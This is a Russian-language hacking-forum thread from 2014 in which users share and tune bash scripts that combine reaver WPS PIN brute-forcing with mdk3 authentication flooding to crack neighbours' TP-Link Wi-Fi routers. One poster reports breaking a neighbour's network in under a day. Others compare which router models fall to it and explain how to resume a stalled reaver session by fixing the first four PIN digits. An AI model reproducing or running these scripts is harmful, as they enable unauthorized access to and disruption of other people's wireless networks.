HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2061  
Старый 01.09.2014, 00:20
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

Цитата:
Сообщение от VladimirV  

Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:

Код:
#!/bin/sh
 while true;
 # Run reaver to work 50s 
 do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
 sleep 4;
 # Run mdk3 to work 10s
 echo [+] Mdk3 is working ...
 timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
 echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
 sleep 24;
 done;
У меня он не заработал и я его переделал:

Код:
#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ... 
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s 
echo
echo
echo [+] Mdk3 is working ... 
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;
и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.

что то слишком красиво и легко ,у меня этот mdk3 никаких проблем никакой точке не доставляет

Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?

Прям так точка и здавалась легко на mdk3?значит точка такая,повезло а функция конкретно в скрипте mdk3 какая,навешивание ложных клиентов или деаут клиентов,или какая другая функция?
 
Ответить с цитированием

  #2062  
Старый 01.09.2014, 00:27
VladimirV
Познавший АНТИЧАТ
Регистрация: 01.04.2013
Сообщений: 1,113
Провел на форуме:
348572

Репутация: 57


По умолчанию

Цитата:
Сообщение от СЕРЖ32  

что то слишком красиво и легко ,у меня этот mdk3 никаких проблем никакой точке не доставляет

Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал?

Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!
 
Ответить с цитированием

  #2063  
Старый 01.09.2014, 00:43
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

Цитата:
Сообщение от VladimirV  

Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!

а не мало ли mdk3 работает?3 сек всего что это за точки,которые от 3 сек падать будут ,я вон миллионы клиентов цеплял,точкам пофиг,тоже тп линк

Говорю ж....красиво всё как то ну или там у тебя такие точки попадаются слабые
 
Ответить с цитированием

  #2064  
Старый 01.09.2014, 00:59
TOX1C
Познавший АНТИЧАТ
Регистрация: 24.03.2012
Сообщений: 1,121
Провел на форуме:
418750

Репутация: 24


По умолчанию

Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны
 
Ответить с цитированием

  #2065  
Старый 01.09.2014, 01:05
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

Цитата:
Сообщение от TOX1C  

Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны
вот и я ж говорю то какие точки просто,видимо слабые сдуваются только,а мощным,хоть миллиард клиентов вешай

Я ж прочитал скрипт и удивился,что mdk3 3 сек только работает,сколько он клиентов на точку повесит ,mdk3 нужно на пол часа оставлять,может и будет эффект
 
Ответить с цитированием

  #2066  
Старый 01.09.2014, 01:43
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

незнаю,что у вас там за точки вокруг слабые,я сейчас скрипт опробывал,в mdk3 время на минуту поставил,и ничего.....

та я на ночь mdk3 ставил,до десятка миллиона клиентов цеплял на точку(точки)и пофиг точкам У вас там просто такие точки,старые наверное,которые от 3 сек mdk3 сдуваются
 
Ответить с цитированием

  #2067  
Старый 01.09.2014, 10:49
UnitUnique
Новичок
Регистрация: 27.09.2009
Сообщений: 17
Провел на форуме:
30996

Репутация: 2
По умолчанию

подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать , окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...
 
Ответить с цитированием

  #2068  
Старый 01.09.2014, 14:28
SlNik
Active Member
Регистрация: 07.02.2014
Сообщений: 322
Провел на форуме:
65951

Репутация: 1
По умолчанию

Цитата:
Сообщение от UnitUnique  

подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать , окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти...

p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...

Вот засада! Прийдется всё заново пересчитывать!

А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.

Такие глюки иногда встречаются. Первая часть уже подобрана верно.
 
Ответить с цитированием

  #2069  
Старый 01.09.2014, 14:55
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

ну что,у кого ещё скрипт работает?(ривер и мдк3)?у меня то скрипт пашет,а толку увеличил уже в скрипте продолжительность работы мдк3,точкам всё равно,хоть миллиард клиентов вешай Незнаю.....видимо мдк3 действует на какие то древние точки,новым пофиг эти все атаки...
 
Ответить с цитированием

  #2070  
Старый 01.09.2014, 19:14
UnitUnique
Новичок
Регистрация: 27.09.2009
Сообщений: 17
Провел на форуме:
30996

Репутация: 2
По умолчанию

Цитата:
Сообщение от SlNik  

Вот засада! Прийдется всё заново пересчитывать!

А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени.

Такие глюки иногда встречаются. Первая часть уже подобрана верно.

спасибо, помогло, странно, что я так не попробовал, тут вроде не раз писалось...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.